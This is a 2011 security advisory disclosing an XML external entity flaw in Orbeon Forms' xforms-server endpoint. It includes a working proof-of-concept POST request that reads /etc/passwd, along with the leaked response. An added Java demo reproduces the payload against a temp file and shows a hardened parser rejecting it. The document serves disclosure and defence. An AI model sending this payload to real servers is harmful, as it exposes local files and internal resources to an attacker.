Apr 14, 2011
- Title: Orbeon Forms XML Entity Dereferencing (SS-2011-004)
- Version: 1.0
- Issue type: XML Entity Dereferencing
- Affected vendor: Orbeon
- Release date: 14/04/2011
- Discovered by: Daniel Grzelak and Rohan Stelling
Summary
stratsec has identified an XML external entity (XXE) dereferencing vulnerability in Orbeon Forms. The issue can be exploited by a remote attacker to access internal network resources and to read local files, subject to OS-level permissions.
Description
Orbeon Forms is a Java-based web form application featuring as-you-type input validation. The application consists of client- and server-side components which communicate via an XForms web service.
When parsing XML requests, the XForms service dereferences external entities. This allows an attacker to declare an entity whose URI points at a resource reachable from the server (typically a local file path or an HTTP URL) and to reference that entity where user input is expected, so that the resource's contents are substituted for the input. The dereferenced resource is subsequently returned in the application's response.
Impact
A remote attacker can read arbitrary files on the server, limited only by the permissions the operating system enforces on the account running the application. It may also be possible to access internal network resources, such as unauthenticated HTTP pages, or to perform network scanning.
Affected products
Orbeon Forms < 3.9
Proof of concept
The issue is present in the http://<hostname>/orbeon/xforms-server page, which receives XML-formatted text in the body of HTTP POST requests.
The issue can be reproduced by editing a form hosted by the application and intercepting requests to http://<hostname>/orbeon/xforms-server. By inserting an entity declaration, such as <!ENTITY file SYSTEM "file:///etc/passwd" >, and substituting user input with the entity reference (i.e. &file;), it is possible to retrieve the contents of the file as shown below:
POST /orbeon/xforms-server HTTP/1.1
Host: 127.0.0.1:8080
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
X-Requested-With: XMLHttpRequest
Content-Type: application/xml; charset=UTF-8
Referer: http://127.0.0.1:8080/orbeon/fr/orbeon/bookshelf/new
Cookie: JSESSIONID=<SESSIONID>
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 561

<!DOCTYPE xxforms:event-request
[<!ENTITY nbsp " "><!ENTITY file SYSTEM "file:///etc/passwd" >]>
<xxforms:event-request xmlns:xxforms="http://orbeon.org/oxf/xml/xforms">
<xxforms:static-state>pers:7A8B5BFB-F697-64CB-8D6E-577EA083BB12</xxforms:static-state>
<xxforms:dynamic-state>pers:7C702384-BE11-3E06-99B2-144D90C301A4</xxforms:dynamic-state>
<xxforms:action>
<xxforms:event name="xxforms-value-change-with-focus-change" source-control-id="author-control">sdfgs&file;dfg</xxforms:event>
</xxforms:action>
</xxforms:event-request>
A typical server response is shown below (site-specific users have been removed):
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 18 Aug 2010 21:28:21 GMT
Expires: Wed, 18 Aug 2010 21:28:21 GMT
Cache-Control: public
Pragma:
Content-Type: application/xml;charset=utf-8
Date: Wed, 18 Aug 2010 21:28:21 GMT
Content-Length: 5524

<?xml version="1.0" encoding="utf-8"?><xxf:event-response xmlns:xxf="http://orbeon.org/oxf/xml/xforms"><xxf:dynamic-state>pers:CD0F4313-45A8-84EF-4CE6-1C1F44363E49</xxf:dynamic-state><xxf:action><xxf:control-values><xxf:control id="author-control" valid="true">sdfgsroot:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
dfg</xxf:control></xxf:control-values>
...
</xxf:event-response>
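The mechanism behind the request and response above, as an added example that is not Orbeon's code and does not reflect how the vendor's patch was implemented: a small Java program builds the same xxforms:event-request payload as the proof of concept, pointing the SYSTEM entity at a constructed temporary file instead of /etc/passwd, and parses it twice with JAXP, once with a default DocumentBuilderFactory (which resolves the entity, so the file contents appear as the value of author-control) and once with a factory configured to reject any DOCTYPE. The class and method names (XxeDemo, defaultBuilder, hardenedBuilder, eventText) are assumptions chosen for illustration.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;

import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;

import org.w3c.dom.Document;
import org.xml.sax.SAXException;

/**
 * Added example, not Orbeon code: the advisory's xxforms:event-request payload
 * parsed with a default JAXP DocumentBuilder and with one that refuses DOCTYPEs.
 */
public class XxeDemo {

    /** JAXP as it ships: DOCTYPE permitted and external general entities resolved. */
    static DocumentBuilder defaultBuilder() throws ParserConfigurationException {
        return DocumentBuilderFactory.newInstance().newDocumentBuilder();
    }

    /**
     * Hardened builder (assumed mitigation, not the vendor's fix). disallow-doctype-decl
     * alone closes the hole, since no entity can be declared without a DOCTYPE; the
     * remaining settings are defence in depth for parsers that must accept a DOCTYPE.
     */
    static DocumentBuilder hardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f.newDocumentBuilder();
    }

    /** Returns the text of the xxforms:event element, i.e. what the server treats as user input. */
    static String eventText(DocumentBuilder builder, String xml) throws Exception {
        Document doc = builder.parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
        // The factory is not namespace-aware by default, so the qualified name is the lookup key.
        return doc.getElementsByTagName("xxforms:event").item(0).getTextContent();
    }

    public static void main(String[] args) throws Exception {
        // Constructed stand-in for /etc/passwd so the demo runs on any OS without reading real secrets.
        Path secret = Files.createTempFile("xxe-demo-", ".txt");
        Files.writeString(secret, "root:x:0:0:root:/root:/bin/bash\n");

        String payload =
              "<!DOCTYPE xxforms:event-request [<!ENTITY file SYSTEM \"" + secret.toUri() + "\">]>\n"
            + "<xxforms:event-request xmlns:xxforms=\"http://orbeon.org/oxf/xml/xforms\">\n"
            + "  <xxforms:action>\n"
            + "    <xxforms:event name=\"xxforms-value-change-with-focus-change\""
            + " source-control-id=\"author-control\">sdfgs&file;dfg</xxforms:event>\n"
            + "  </xxforms:action>\n"
            + "</xxforms:event-request>\n";

        try {
            // Default parser: the temp file's contents are spliced into the control value.
            System.out.println("default parser, event text: " + eventText(defaultBuilder(), payload));

            // Hardened parser: the DOCTYPE itself is rejected before any entity is declared.
            try {
                eventText(hardenedBuilder(), payload);
                System.out.println("hardened parser: unexpectedly accepted the DOCTYPE");
            } catch (SAXException e) {
                System.out.println("hardened parser rejected the request: " + e.getMessage());
            }
        } finally {
            Files.deleteIfExists(secret);
        }
    }
}
```

Compile and run with `javac XxeDemo.java && java XxeDemo`. Disallowing the DOCTYPE is the setting to prefer; note that the proof-of-concept request also relies on the DOCTYPE to declare &nbsp;, so an application that must accept a DOCTYPE has to keep the other four settings and should additionally install an EntityResolver (DocumentBuilder.setEntityResolver) that never opens the requested URI.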
Solution
The vendor has informed stratsec that this issue was resolved in Orbeon Forms 3.9.0 Release Candidate 1. Note that stratsec has not assessed the vendor’s solution.
Response timeline
- 31/08/2010 - Vendor notified.
- 3/09/2010 - Vendor acknowledges receipt of advisory.
- 3/09/2010 - Vendor confirms issue presence.
- 4/12/2010 - Vendor confirms fix applied to code base.
- 9/12/2010 - Vendor advised that advisory publication is imminent.
- 11/03/2011 - Orbeon Forms 3.9.0 Release Candidate 1 released, which addresses this issue.
- 14/04/2011 - This advisory published.
References
Vendor acknowledgement: http://wiki.orbeon.com/forms/doc/developer-guide/release-notes/39#TOC-Security
Vendor patch: https://github.com/orbeon/orbeon-forms/commit/aba6681660f65af7f1676434da68c10298c30200
CVE item: CVE-2010-3260
Download advisory: SS-2011-004 stratsec Orbeon Forms XML Entity Advisory v1.0.pdf